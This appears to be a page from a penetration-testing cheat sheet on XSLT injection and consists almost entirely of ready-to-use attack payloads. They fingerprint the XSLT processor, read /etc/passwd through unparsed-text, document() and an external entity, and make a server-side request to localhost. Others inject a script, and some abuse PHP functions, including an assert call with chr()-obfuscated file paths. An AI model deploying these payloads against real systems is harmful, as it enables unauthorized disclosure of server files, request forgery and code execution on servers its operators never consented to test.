XSLT (eXtensible Stylesheet Language Transformations)

<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://google.com/data/news.xml" stylesheet="http://google.com/news_template.xsl"></esi:include>
<b>Version:</b> <xsl:value-of select="system-property('xsl:version')"/><br/>
<b>Vendor:</b> <xsl:value-of select="system-property('xsl:vendor')" /><br/>
<b>Vendor URL:</b><xsl:value-of select="system-property('xsl:vendor-url')" /><br/>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0"><xsl:template match="/"><xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/></xsl:template></xsl:stylesheet>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0"><xsl:include href="http://127.0.0.1:8000/xslt"/><xsl:template match="/"></xsl:template></xsl:stylesheet>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><script>confirm("We're good");</script></xsl:template></xsl:stylesheet>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0"><xsl:template match="/"><xsl:value-of select="unparsed-text('/etc/passwd', ‘utf-8')"/></xsl:template></xsl:stylesheet>
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><xsl:value-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>
<!DOCTYPE xsl:stylesheet [<!ENTITY passwd SYSTEM "file:///etc/passwd" >]><xsl:template match="/">&passwd;</xsl:template>
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" ><xsl:template match="/"><xsl:value-of select="php:function('file_get_contents','/path/to/file')"/></xsl:template></xsl:stylesheet>
<?xml version="1.0" encoding="UTF-8"?><html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">    <body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">        <xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />        <br />    </body></html>
<?xml version="1.0" encoding="ISO-8859-1"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"> Version: <xsl:value-of select="system-property('xsl:version')" /><br /> Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br /> Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br /> <xsl:if test="system-property('xsl:product-name')"> Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br /> </xsl:if> <xsl:if test="system-property('xsl:product-version')"> Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br /> </xsl:if> <xsl:if test="system-property('xsl:is-schema-aware')"> Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br /> </xsl:if> <xsl:if test="system-property('xsl:supports-serialization')"> Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"/><br /> </xsl:if> <xsl:if test="system-property('xsl:supports-backwards-compatibility')"> Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"/><br /> </xsl:if></xsl:template>
PreviousXML-External-EntityNextXSS Cheat Sheet

Last updated